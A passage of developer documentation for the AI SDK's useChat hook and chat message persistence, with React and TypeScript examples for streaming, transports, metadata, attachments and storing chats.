const [input, setInput] = useState('');
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
</div>
))}
<form
onSubmit={e => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
}}
>
<input
value={input}
onChange={e => setInput(e.target.value)}
disabled={status !== 'ready'}
placeholder="Say something..."
/>
<button type="submit" disabled={status !== 'ready'}>
Submit
</button>
</form>
</>
);
}
import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
system: 'You are a helpful assistant.',
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
In the Page component, the useChat hook sends a request to your AI provider endpoint whenever the user submits a message using sendMessage.
The messages are then streamed back in real-time and displayed in the chat UI.
This enables a seamless chat experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.
Customized UI
useChat also provides ways to manage chat message state programmatically, display the current status, and update messages without requiring user interaction.
Status
The useChat hook returns a status. It has the following possible values:
- submitted: The message has been sent to the API and we're awaiting the start of the response stream.
- streaming: The response is actively streaming in from the API, receiving chunks of data.
- ready: The full response has been received and processed; a new user message can be submitted.
- error: An error occurred during the API request, preventing successful completion.
You can use status for the following purposes:
- To show a loading spinner while the chatbot is processing the user's message.
- To show a "Stop" button to abort the current message.
- To disable the submit button.
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Page() {
const { messages, sendMessage, status, stop } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
const [input, setInput] = useState('');
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
</div>
))}
{(status === 'submitted' || status === 'streaming') && (
<div>
{status === 'submitted' && <Spinner />}
<button type="button" onClick={() => stop()}>
Stop
</button>
</div>
)}
<form
onSubmit={e => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
}}
>
<input
value={input}
onChange={e => setInput(e.target.value)}
disabled={status !== 'ready'}
placeholder="Say something..."
/>
<button type="submit" disabled={status !== 'ready'}>
Submit
</button>
</form>
</>
);
}
Error State
Similarly, the error state reflects the error object thrown during the fetch request.
It can be used to display an error message, disable the submit button, or show a retry button:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Chat() {
const { messages, sendMessage, error, regenerate } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
const [input, setInput] = useState('');
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role}:{' '}
{m.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
</div>
))}
{error && (
<>
<div>An error occurred.</div>
<button type="button" onClick={() => regenerate()}>
Retry
</button>
</>
)}
<form
onSubmit={e => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
}}
>
<input
value={input}
onChange={e => setInput(e.target.value)}
disabled={error != null}
/>
</form>
</div>
);
}
Please also see the error handling guide for more information.
Modify messages
Sometimes, you may want to directly modify some existing messages. For example, a delete button can be added to each message to allow users to remove them from the chat history.
The setMessages function can help you achieve these tasks:
const { messages, setMessages } = useChat()
const handleDelete = (id) => {
setMessages(messages.filter(message => message.id !== id))
}
return <>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => (
part.type === 'text' ? (
<span key={index}>{part.text}</span>
) : null
))}
<button onClick={() => handleDelete(message.id)}>Delete</button>
</div>
))}
...
You can think of messages and setMessages as a pair of state and setState in React.
Cancellation and regeneration
It's also a common use case to abort the response message while it's still streaming back from the AI provider. You can do this by calling the stop function returned by the useChat hook.
const { stop, status } = useChat()
return <>
<button onClick={stop} disabled={!(status === 'streaming' || status === 'submitted')}>Stop</button>
...
When the user clicks the "Stop" button, the fetch request will be aborted. This avoids consuming unnecessary resources and improves the UX of your chatbot application.
Similarly, you can also request the AI provider to reprocess the last message by calling the regenerate function returned by the useChat hook:
const { regenerate, status } = useChat();
return (
<>
<button
onClick={regenerate}
disabled={!(status === 'ready' || status === 'error')}
>
Regenerate
</button>
...
</>
);
When the user clicks the "Regenerate" button, the AI provider will regenerate the last message and replace the current one correspondingly.
Throttling UI Updates
This feature is currently only available for React.
By default, the useChat hook will trigger a render every time a new chunk is received.
You can throttle the UI updates with the experimental_throttle option.
const { messages, ... } = useChat({
// Throttle the messages and data updates to 50ms:
experimental_throttle: 50
})
Event Callbacks
useChat provides optional event callbacks that you can use to handle different stages of the chatbot lifecycle:
- onFinish: Called when the assistant response is completed. The event includes the response message, all messages, and flags for abort, disconnect, and errors.
- onError: Called when an error occurs during the fetch request.
- onData: Called whenever a data part is received.
These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.
import { UIMessage } from 'ai';
const {
/* ... */
} = useChat({
onFinish: ({ message, messages, isAbort, isDisconnect, isError }) => {
// use information to e.g. update other UI states
},
onError: error => {
console.error('An error occurred:', error);
},
onData: data => {
console.log('Received data part from server:', data);
},
});
It's worth noting that you can abort the processing by throwing an error in the onData callback. This will trigger the onError callback and stop the message from being appended to the chat UI. This can be useful for handling unexpected responses from the AI provider.
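For example, here is a minimal sketch that rejects a malformed custom data part (the data-notification part type is hypothetical; substitute your own data part types):
const { messages } = useChat({
  onData: data => {
    // Hypothetical custom data part; replace with your own type check:
    if (data.type === 'data-notification' && data.data == null) {
      // Throwing here triggers onError and stops the message
      // from being appended to the chat UI:
      throw new Error('Received malformed data part');
    }
  },
  onError: error => {
    console.error('An error occurred:', error);
  },
});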
Request Configuration
Custom headers, body, and credentials
By default, the useChat hook sends an HTTP POST request to the /api/chat endpoint with the message list as the request body. You can customize the request in two ways:
Hook-Level Configuration (Applied to all requests)
You can configure transport-level options that will be applied to all requests made by the hook:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/custom-chat',
headers: {
Authorization: 'your_token',
},
body: {
user_id: '123',
},
credentials: 'same-origin',
}),
});
Dynamic Hook-Level Configuration
You can also provide functions that return configuration values. This is useful for authentication tokens that need to be refreshed, or for configuration that depends on runtime conditions:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/custom-chat',
headers: () => ({
Authorization: `Bearer ${getAuthToken()}`,
'X-User-ID': getCurrentUserId(),
}),
body: () => ({
sessionId: getCurrentSessionId(),
preferences: getUserPreferences(),
}),
credentials: () => 'include',
}),
});
Request-Level Configuration (Recommended)
// Pass options as the second parameter to sendMessage
sendMessage(
{ text: input },
{
headers: {
Authorization: 'Bearer token123',
'X-Custom-Header': 'custom-value',
},
body: {
temperature: 0.7,
max_tokens: 100,
user_id: '123',
},
metadata: {
userId: 'user123',
sessionId: 'session456',
},
},
);
The request-level options are merged with hook-level options, with request-level options taking precedence. On your server side, you can handle the request with this additional information.
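For instance, a route handler could read the merged options like this (a sketch; the header and body field names match the example above):
export async function POST(req: Request) {
  // Custom header set on the client:
  const authHeader = req.headers.get('Authorization');

  // Custom body fields arrive merged alongside the messages:
  const { messages, temperature, max_tokens, user_id } = await req.json();

  // ... validate the header and use the fields to configure the model call
}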
Setting custom body fields per request
You can configure custom body fields on a per-request basis using the second parameter of the sendMessage function.
This is useful if you want to pass in additional information to your backend that is not part of the message list.
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Chat() {
const { messages, sendMessage } = useChat();
const [input, setInput] = useState('');
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role}:{' '}
{m.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
</div>
))}
<form
onSubmit={event => {
event.preventDefault();
if (input.trim()) {
sendMessage(
{ text: input },
{
body: {
customKey: 'customValue',
},
},
);
setInput('');
}
}}
>
<input value={input} onChange={e => setInput(e.target.value)} />
</form>
</div>
);
}
You can retrieve these custom fields on your server side by destructuring the request body:
export async function POST(req: Request) {
// Extract additional information ("customKey") from the body of the request:
const { messages, customKey }: { messages: UIMessage[]; customKey: string } =
await req.json();
//...
}
Message Metadata
You can attach custom metadata to messages for tracking information like timestamps, model details, and token usage.
// Server: Send metadata about the message
return result.toUIMessageStreamResponse({
messageMetadata: ({ part }) => {
if (part.type === 'start') {
return {
createdAt: Date.now(),
model: 'gpt-5.1',
};
}
if (part.type === 'finish') {
return {
totalTokens: part.totalUsage.totalTokens,
};
}
},
});
// Client: Access metadata via message.metadata
{
messages.map(message => (
<div key={message.id}>
{message.role}:{' '}
{message.metadata?.createdAt &&
new Date(message.metadata.createdAt).toLocaleTimeString()}
{/* Render message content */}
{message.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
{/* Show token count if available */}
{message.metadata?.totalTokens && (
<span>{message.metadata.totalTokens} tokens</span>
)}
</div>
));
}
For complete examples with type safety and advanced use cases, see the Message Metadata documentation.
Transport Configuration
You can configure custom transport behavior using the transport option to customize how messages are sent to your API:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
export default function Chat() {
const { messages, sendMessage } = useChat({
id: 'my-chat',
transport: new DefaultChatTransport({
prepareSendMessagesRequest: ({ id, messages }) => {
return {
body: {
id,
message: messages[messages.length - 1],
},
};
},
}),
});
// ... rest of your component
}
The corresponding API route receives the custom request format:
export async function POST(req: Request) {
const { id, message } = await req.json();
// Load existing messages and add the new one
const messages = await loadMessages(id);
messages.push(message);
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Advanced: Trigger-based routing
For more complex scenarios like message regeneration, you can use trigger-based routing:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
export default function Chat() {
const { messages, sendMessage, regenerate } = useChat({
id: 'my-chat',
transport: new DefaultChatTransport({
prepareSendMessagesRequest: ({ id, messages, trigger, messageId }) => {
if (trigger === 'submit-user-message') {
return {
body: {
trigger: 'submit-user-message',
id,
message: messages[messages.length - 1],
messageId,
},
};
} else if (trigger === 'regenerate-assistant-message') {
return {
body: {
trigger: 'regenerate-assistant-message',
id,
messageId,
},
};
}
throw new Error(`Unsupported trigger: ${trigger}`);
},
}),
});
// ... rest of your component
}
The corresponding API route would handle different triggers:
export async function POST(req: Request) {
const { trigger, id, message, messageId } = await req.json();
const chat = await readChat(id);
let messages = chat.messages;
if (trigger === 'submit-user-message') {
// Handle new user message
messages = [...messages, message];
} else if (trigger === 'regenerate-assistant-message') {
// Handle message regeneration - remove messages after messageId
const messageIndex = messages.findIndex(m => m.id === messageId);
if (messageIndex !== -1) {
messages = messages.slice(0, messageIndex);
}
}
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
To learn more about building custom transports, refer to the Transport API documentation.
Direct Agent Transport
For scenarios where you want to communicate directly with an Agent without going through HTTP, you can use DirectChatTransport. This is useful for:
- Server-side rendering scenarios
- Testing without network
- Single-process applications
import { useChat } from '@ai-sdk/react';
import { DirectChatTransport, ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
instructions: 'You are a helpful assistant.',
});
export default function Chat() {
const { messages, sendMessage, status } = useChat({
transport: new DirectChatTransport({ agent }),
});
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
</div>
))}
<button
onClick={() => sendMessage({ text: 'Hello!' })}
disabled={status !== 'ready'}
>
Send
</button>
</>
);
}
The DirectChatTransport invokes the agent's stream() method directly, converting UI messages to model messages and streaming the response back as UI message chunks.
For more details, see the DirectChatTransport reference.
Controlling the response stream
With streamText, you can control how error messages and usage information are sent back to the client.
Error Messages
By default, the error message is masked for security reasons.
The default error message is "An error occurred."
You can forward error messages or send your own error message by providing an onError callback to toUIMessageStreamResponse:
import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
onError: error => {
if (error == null) {
return 'unknown error';
}
if (typeof error === 'string') {
return error;
}
if (error instanceof Error) {
return error.message;
}
return JSON.stringify(error);
},
});
}
Usage Information
Track token consumption and resource usage with message metadata:
- Define a custom metadata type with usage fields (optional, for type safety)
- Attach usage data using messageMetadata in your response
- Display usage metrics in your UI components
Usage data is attached as metadata to messages and becomes available once the model completes its response generation.
import {
convertToModelMessages,
streamText,
UIMessage,
type LanguageModelUsage,
} from 'ai';
__PROVIDER_IMPORT__;
// Create a new metadata type (optional for type-safety)
type MyMetadata = {
totalUsage: LanguageModelUsage;
};
// Create a new custom message type with your own metadata
export type MyUIMessage = UIMessage<MyMetadata>;
export async function POST(req: Request) {
const { messages }: { messages: MyUIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
originalMessages: messages,
messageMetadata: ({ part }) => {
// Send total usage when generation is finished
if (part.type === 'finish') {
return { totalUsage: part.totalUsage };
}
},
});
}
Then, on the client, you can access the message-level metadata.
'use client';
import { useChat } from '@ai-sdk/react';
import type { MyUIMessage } from './api/chat/route';
import { DefaultChatTransport } from 'ai';
export default function Chat() {
// Use custom message type defined on the server (optional for type-safety)
const { messages } = useChat<MyUIMessage>({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
{m.role === 'user' ? 'User: ' : 'AI: '}
{m.parts.map(part => {
if (part.type === 'text') {
return part.text;
}
})}
{/* Render usage via metadata */}
{m.metadata?.totalUsage && (
<div>Total usage: {m.metadata?.totalUsage.totalTokens} tokens</div>
)}
</div>
))}
</div>
);
}
You can also access your metadata from the onFinish callback of useChat:
'use client';
import { useChat } from '@ai-sdk/react';
import type { MyUIMessage } from './api/chat/route';
import { DefaultChatTransport } from 'ai';
export default function Chat() {
// Use custom message type defined on the server (optional for type-safety)
const { messages } = useChat<MyUIMessage>({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
onFinish: ({ message }) => {
// Access message metadata via onFinish callback
console.log(message.metadata?.totalUsage);
},
});
}
Text Streams
useChat can handle plain text streams by using the TextStreamChatTransport:
'use client';
import { useChat } from '@ai-sdk/react';
import { TextStreamChatTransport } from 'ai';
export default function Chat() {
const { messages } = useChat({
transport: new TextStreamChatTransport({
api: '/api/chat',
}),
});
return <>...</>;
}
This configuration also works with other backend servers that stream plain text. Check out the stream protocol guide for more information.
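As a sketch, a matching route handler can return a plain text stream using toTextStreamResponse (the model id is illustrative):
import { convertToModelMessages, streamText, UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-5-mini',
    messages: await convertToModelMessages(messages),
  });

  // Send plain text instead of the UI message stream protocol:
  return result.toTextStreamResponse();
}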
Reasoning
Some models such as DeepSeek deepseek-r1
and Anthropic claude-sonnet-4-5-20250929 support reasoning tokens.
These tokens are typically sent before the message content.
You can forward them to the client with the sendReasoning option:
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'deepseek/deepseek-r1',
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
sendReasoning: true,
});
}
On the client side, you can access the reasoning parts of the message object.
Reasoning parts have a text property that contains the reasoning content.
messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
// text parts:
if (part.type === 'text') {
return <div key={index}>{part.text}</div>;
}
// reasoning parts:
if (part.type === 'reasoning') {
return <pre key={index}>{part.text}</pre>;
}
})}
</div>
));
Sources
Some providers such as Perplexity and Google Generative AI include sources in the response.
Currently sources are limited to web pages that ground the response.
You can forward them to the client with the sendSources option:
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'perplexity/sonar-pro',
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
sendSources: true,
});
}
On the client side, you can access source parts of the message object.
There are two types of sources: source-url for web pages and source-document for documents.
Here is an example that renders both types of sources:
messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{/* Render URL sources */}
{message.parts
.filter(part => part.type === 'source-url')
.map(part => (
<span key={`source-${part.id}`}>
[
<a href={part.url} target="_blank">
{part.title ?? new URL(part.url).hostname}
</a>
]
</span>
))}
{/* Render document sources */}
{message.parts
.filter(part => part.type === 'source-document')
.map(part => (
<span key={`source-${part.id}`}>
[<span>{part.title ?? `Document ${part.id}`}</span>]
</span>
))}
</div>
));
Image Generation
Some models such as Google gemini-2.5-flash-image support image generation.
When images are generated, they are exposed as files to the client.
On the client side, you can access file parts of the message object
and render them as images.
messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <div key={index}>{part.text}</div>;
} else if (part.type === 'file' && part.mediaType.startsWith('image/')) {
return <img key={index} src={part.url} alt="Generated image" />;
}
})}
</div>
));
Attachments
The useChat hook supports sending file attachments along with a message as well as rendering them on the client. This can be useful for building applications that involve sending images, files, or other media content to the AI provider.
There are two ways to send files with a message: using a FileList object from file inputs or using an array of file objects.
FileList
By using FileList, you can send multiple files as attachments along with a message using the file input element. The useChat hook will automatically convert them into data URLs and send them to the AI provider.
'use client';
import { useChat } from '@ai-sdk/react';
import { useRef, useState } from 'react';
export default function Page() {
const { messages, sendMessage, status } = useChat();
const [input, setInput] = useState('');
const [files, setFiles] = useState<FileList | undefined>(undefined);
const fileInputRef = useRef<HTMLInputElement>(null);
return (
<div>
<div>
{messages.map(message => (
<div key={message.id}>
<div>{`${message.role}: `}</div>
<div>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
if (
part.type === 'file' &&
part.mediaType?.startsWith('image/')
) {
return <img key={index} src={part.url} alt={part.filename} />;
}
return null;
})}
</div>
</div>
))}
</div>
<form
onSubmit={event => {
event.preventDefault();
if (input.trim()) {
sendMessage({
text: input,
files,
});
setInput('');
setFiles(undefined);
if (fileInputRef.current) {
fileInputRef.current.value = '';
}
}
}}
>
<input
type="file"
onChange={event => {
if (event.target.files) {
setFiles(event.target.files);
}
}}
multiple
ref={fileInputRef}
/>
<input
value={input}
placeholder="Send message..."
onChange={e => setInput(e.target.value)}
disabled={status !== 'ready'}
/>
</form>
</div>
);
}
File Objects
You can also send files as objects along with a message. This can be useful for sending pre-uploaded files or data URLs.
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { FileUIPart } from 'ai';
export default function Page() {
const { messages, sendMessage, status } = useChat();
const [input, setInput] = useState('');
const [files] = useState<FileUIPart[]>([
{
type: 'file',
filename: 'earth.png',
mediaType: 'image/png',
url: 'https://example.com/earth.png',
},
{
type: 'file',
filename: 'moon.png',
mediaType: 'image/png',
url: 'data:image/png;base64,iVBORw0KGgo...',
},
]);
return (
<div>
<div>
{messages.map(message => (
<div key={message.id}>
<div>{`${message.role}: `}</div>
<div>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
if (
part.type === 'file' &&
part.mediaType?.startsWith('image/')
) {
return <img key={index} src={part.url} alt={part.filename} />;
}
return null;
})}
</div>
</div>
))}
</div>
<form
onSubmit={event => {
event.preventDefault();
if (input.trim()) {
sendMessage({
text: input,
files,
});
setInput('');
}
}}
>
<input
value={input}
placeholder="Send message..."
onChange={e => setInput(e.target.value)}
disabled={status !== 'ready'}
/>
</form>
</div>
);
}
Type Inference for Tools
When working with tools in TypeScript, AI SDK UI provides type inference helpers to ensure type safety for your tool inputs and outputs.
InferUITool
The InferUITool type helper infers the input and output types of a single tool for use in UI messages:
import { InferUITool } from 'ai';
import { z } from 'zod';
const weatherTool = {
description: 'Get the current weather',
inputSchema: z.object({
location: z.string().describe('The city and state'),
}),
execute: async ({ location }) => {
return `The weather in ${location} is sunny.`;
},
};
// Infer the types from the tool
type WeatherUITool = InferUITool<typeof weatherTool>;
// This creates a type with:
// {
// input: { location: string };
// output: string;
// }
InferUITools
The InferUITools type helper infers the input and output types of a ToolSet:
import { InferUITools, ToolSet } from 'ai';
import { z } from 'zod';
const tools = {
weather: {
description: 'Get the current weather',
inputSchema: z.object({
location: z.string().describe('The city and state'),
}),
execute: async ({ location }) => {
return `The weather in ${location} is sunny.`;
},
},
calculator: {
description: 'Perform basic arithmetic',
inputSchema: z.object({
operation: z.enum(['add', 'subtract', 'multiply', 'divide']),
a: z.number(),
b: z.number(),
}),
execute: async ({ operation, a, b }) => {
switch (operation) {
case 'add':
return a + b;
case 'subtract':
return a - b;
case 'multiply':
return a * b;
case 'divide':
return a / b;
}
},
},
} satisfies ToolSet;
// Infer the types from the tool set
type MyUITools = InferUITools<typeof tools>;
// This creates a type with:
// {
// weather: { input: { location: string }; output: string };
// calculator: { input: { operation: 'add' | 'subtract' | 'multiply' | 'divide'; a: number; b: number }; output: number };
// }
Using Inferred Types
You can use these inferred types to create a custom UIMessage type and pass it to various AI SDK UI functions:
import { InferUITools, UIMessage, UIDataTypes } from 'ai';
type MyUITools = InferUITools<typeof tools>;
type MyUIMessage = UIMessage<never, UIDataTypes, MyUITools>;
Pass the custom type to useChat or createUIMessageStream:
import { useChat } from '@ai-sdk/react';
import { createUIMessageStream } from 'ai';
import type { MyUIMessage } from './types';
// With useChat
const { messages } = useChat<MyUIMessage>();
// With createUIMessageStream
const stream = createUIMessageStream<MyUIMessage>(/* ... */);
This provides full type safety for tool inputs and outputs on the client and server.
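For example, with the MyUIMessage type above, tool parts are narrowed to typed variants such as tool-weather and tool-calculator (a sketch; the rendering is simplified):
const { messages } = useChat<MyUIMessage>();

messages.map(message =>
  message.parts.map((part, index) => {
    if (part.type === 'tool-weather' && part.state === 'output-available') {
      // part.output is inferred as string from the weather tool
      return <div key={index}>{part.output}</div>;
    }
    return null;
  }),
);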
title: Chatbot Message Persistence
description: Learn how to store and load chat messages in a chatbot.
Chatbot Message Persistence
Being able to store and load chat messages is crucial for most AI chatbots.
In this guide, we'll show how to implement message persistence with useChat and streamText.
Starting a new chat
When the user navigates to the chat page without providing a chat ID, we need to create a new chat and redirect to the chat page with the new chat ID.
import { redirect } from 'next/navigation';
import { createChat } from '@util/chat-store';
export default async function Page() {
const id = await createChat(); // create a new chat
redirect(`/chat/${id}`); // redirect to chat page, see below
}
Our example chat store implementation uses files to store the chat messages. In a real-world application, you would use a database or a cloud storage service, and get the chat ID from the database. That being said, the function interfaces are designed to be easily replaced with other implementations.
import { generateId } from 'ai';
import { existsSync, mkdirSync } from 'fs';
import { writeFile } from 'fs/promises';
import path from 'path';
export async function createChat(): Promise<string> {
const id = generateId(); // generate a unique chat ID
await writeFile(getChatFile(id), '[]'); // create an empty chat file
return id;
}
function getChatFile(id: string): string {
const chatDir = path.join(process.cwd(), '.chats');
if (!existsSync(chatDir)) mkdirSync(chatDir, { recursive: true });
return path.join(chatDir, `${id}.json`);
}
Loading an existing chat
When the user navigates to the chat page with a chat ID, we need to load the chat messages from storage.
The loadChat function in our file-based chat store is implemented as follows:
import { UIMessage } from 'ai';
import { readFile } from 'fs/promises';
export async function loadChat(id: string): Promise<UIMessage[]> {
return JSON.parse(await readFile(getChatFile(id), 'utf8'));
}
// ... rest of the file
Validating messages on the server
When processing messages on the server that contain tool calls, custom metadata, or data parts, you should validate them using validateUIMessages before sending them to the model.
Validation with tools
When your messages include tool calls, validate them against your tool definitions:
import {
convertToModelMessages,
streamText,
UIMessage,
validateUIMessages,
tool,
} from 'ai';
import { z } from 'zod';
import { loadChat, saveChat } from '@util/chat-store';
import { dataPartsSchema, metadataSchema } from '@util/schemas';
// Define your tools
const tools = {
weather: tool({
description: 'Get weather information',
inputSchema: z.object({
location: z.string(),
units: z.enum(['celsius', 'fahrenheit']),
}),
execute: async ({ location, units }) => {
/* tool implementation */
},
}),
// other tools
};
export async function POST(req: Request) {
const { message, id } = await req.json();
// Load previous messages from database
const previousMessages = await loadChat(id);
// Append the new message to the previous messages
const messages = [...previousMessages, message];
// Validate loaded messages against
// tools, data parts schema, and metadata schema
const validatedMessages = await validateUIMessages({
messages,
tools, // Ensures tool calls in messages match current schemas
dataPartsSchema,
metadataSchema,
});
const result = streamText({
model: 'openai/gpt-5-mini',
messages: convertToModelMessages(validatedMessages),
tools,
});
return result.toUIMessageStreamResponse({
originalMessages: messages,
onFinish: ({ messages }) => {
saveChat({ chatId: id, messages });
},
});
}
Handling validation errors
Handle validation errors gracefully when messages from the database don't match current schemas:
import {
convertToModelMessages,
streamText,
validateUIMessages,
TypeValidationError,
} from 'ai';
import { type MyUIMessage } from '@/types';
export async function POST(req: Request) {
const { message, id } = await req.json();
// Load and validate messages from database
let validatedMessages: MyUIMessage[];
try {
const previousMessages = await loadMessagesFromDB(id);
validatedMessages = await validateUIMessages({
// append the new message to the previous messages:
messages: [...previousMessages, message],
tools,
metadataSchema,
});
} catch (error) {
if (error instanceof TypeValidationError) {
// Log validation error for monitoring
console.error('Database messages validation failed:', error);
// Could implement message migration or filtering here
// For now, start with empty history
validatedMessages = [];
} else {
throw error;
}
}
// Continue with validated messages...
}
Displaying the chat
Once messages are loaded from storage, you can display them in your chat UI. Here's how to set up the page component and the chat display:
import { loadChat } from '@util/chat-store';
import Chat from '@ui/chat';
export default async function Page(props: { params: Promise<{ id: string }> }) {
const { id } = await props.params;
const messages = await loadChat(id);
return <Chat id={id} initialMessages={messages} />;
}
The chat component uses the useChat hook to manage the conversation:
'use client';
import { UIMessage, useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Chat({
id,
initialMessages,
}: { id?: string | undefined; initialMessages?: UIMessage[] } = {}) {
const [input, setInput] = useState('');
const { sendMessage, messages } = useChat({
id, // use the provided chat ID
messages: initialMessages, // load initial messages
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
// simplified rendering code, extend as needed:
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role === 'user' ? 'User: ' : 'AI: '}
{m.parts
.map(part => (part.type === 'text' ? part.text : ''))
.join('')}
</div>
))}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={e => setInput(e.target.value)}
placeholder="Type a message..."
/>
<button type="submit">Send</button>
</form>
</div>
);
}
Storing messages
useChat sends the chat id and the messages to the backend.
When loading messages from storage that contain tools, metadata, or custom data
parts, validate them using validateUIMessages before processing (see the
validation section above).
Storing messages is done in the onFinish callback of the toUIMessageStreamResponse function.
onFinish receives the complete messages including the new AI response as UIMessage[].
import { openai } from '@ai-sdk/openai';
import { saveChat } from '@util/chat-store';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages, chatId }: { messages: UIMessage[]; chatId: string } =
await req.json();
const result = streamText({
model: 'openai/gpt-5-mini',
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
originalMessages: messages,
onFinish: ({ messages }) => {
saveChat({ chatId, messages });
},
});
}
The actual storage of the messages is done in the saveChat function, which in
our file-based chat store is implemented as follows:
import { UIMessage } from 'ai';
import { writeFile } from 'fs/promises';
export async function saveChat({
chatId,
messages,
}: {
chatId: string;
messages: UIMessage[];
}): Promise<void> {
const content = JSON.stringify(messages, null, 2);
await writeFile(getChatFile(chatId), content);
}
// ... rest of the file
Message IDs
In addition to a chat ID, each message has an ID. You can use this message ID to e.g. manipulate individual messages.
Client-side vs Server-side ID Generation
By default, message IDs are generated client-side:
- User message IDs are generated by the useChat hook on the client
- AI response message IDs are generated by streamText on the server
For applications without persistence, client-side ID generation works perfectly. However, for persistence, you need server-side generated IDs to ensure consistency across sessions and prevent ID conflicts when messages are stored and retrieved.
Setting Up Server-side ID Generation
When implementing persistence, you have two options for generating server-side IDs:
- Using generateMessageId in toUIMessageStreamResponse
- Setting IDs in your start message part with createUIMessageStream
Option 1: Using generateMessageId in toUIMessageStreamResponse
You can control the ID format by providing ID generators using createIdGenerator():
import { createIdGenerator, streamText } from 'ai';
export async function POST(req: Request) {
// ...
const result = streamText({
// ...
});
return result.toUIMessageStreamResponse({
originalMessages: messages,
// Generate consistent server-side IDs for persistence:
generateMessageId: createIdGenerator({
prefix: 'msg',
size: 16,
}),
onFinish: ({ messages }) => {
saveChat({ chatId, messages });
},
});
}
Option 2: Setting IDs with createUIMessageStream
Alternatively, you can use createUIMessageStream to control the message ID by writing a start message part:
import {
convertToModelMessages,
generateId,
streamText,
createUIMessageStream,
createUIMessageStreamResponse,
} from 'ai';
export async function POST(req: Request) {
const { messages, chatId } = await req.json();
const stream = createUIMessageStream({
execute: async ({ writer }) => {
// Write start message part with custom ID
writer.write({
